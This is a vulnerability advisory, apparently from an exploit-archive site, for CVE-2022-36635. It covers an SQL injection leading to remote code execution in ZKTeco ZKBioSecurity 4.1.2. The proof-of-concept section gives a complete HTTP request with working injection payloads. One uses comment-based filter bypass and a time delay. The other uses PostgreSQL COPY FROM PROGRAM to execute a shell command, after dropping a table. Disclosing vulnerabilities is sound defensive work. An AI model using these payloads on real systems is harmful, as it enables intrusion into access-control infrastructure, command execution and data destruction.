ZKSecurity BIO 4.1.2 SQL Injection / Code Execution

2022.10.01
Credit: Silton Santos
Risk: High
Local: No
Remote: Yes
CVE: CVE-2022-36635
CWE: CWE-89

#######################ADVISORY INFORMATION####################### Product: ZKSecurity BIO Vendor: ZKTeco ( https://www.zkteco.com/en/ZKBiosecurity/ZKBioSecurity_V5000_4.1.2) Version Affected: 4.1.2 CVE: CVE-2022-36635 Vulnerability: SQL Injection (with a plus: RCE) #######################CREDIT####################### This vulnerability was discovered and researched by Caio Burgardt and Silton Santos. #######################INTRODUCTION####################### Based on the hybrid biometric technology and computer vision technology, ZKBioSecurity provides a comprehensive web-based security platform. It contains multiple integrated modules: personnel, time & attendance, access control, visitor management, offline & online consumption management, guard patrol, parking, elevator control, entrance control, Facekiosk, intelligent video management, mask and temperature detection module, and other smart sub-systems. #######################VULNERABILITY DETAILS####################### The parameters opTimeBegin e opTimeEnd are simply concatenated to the SQL query, with only a sanitization filter in front of it. Using comments (/**/) in place of spaces was enough to confuse and bypass the filter. #######################PROOF OF CONCEPT####################### Note that the request delayed 10s: POST /baseOpLog.do HTTP/1.1 Host: {HOST} Content-Type: application/x-www-form-urlencoded Cookie: SESSION={COOKIE}; menuType=icon-only Content-Length: 208 list&pageSize=50&opTimeBegin=2022-06-26%2000:00:00')/**/tmp_count;select/**/pg_sleep(10);/**/select+1+from+BASE_OPLOG/**/WHERE/**/'1'='1&opTimeEnd=2022-09-26%2023:59:59&sortName=&sortOrder=&posStart=0&count=50 if you use the next query, you can execute remote command: list&pageSize=50&opTimeBegin=2022-04-11%2000:00:00&opTimeEnd=2022-07-11%2023:59:59')/**/tmp_count;DROP/**/TABLE/**/IF/**/EXISTS/**/cmd_exec;CREATE/**/TABLE/**/cmd_exec/**/(cmd_output/**/text);COPY/**/cmd_exec/**/FROM/**/PROGRAM/**/'ping+domain';SELECT/**/*/**/FROM/**/cmd_exec;/**/SeLECT/**/count/**/(1)/**/fRom/**/(SeLECT/**/t.CREATE_TIME/**/fROM/**/BASE_OPLOG/**/t/**/where/**/'1'=' #######################END#######################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top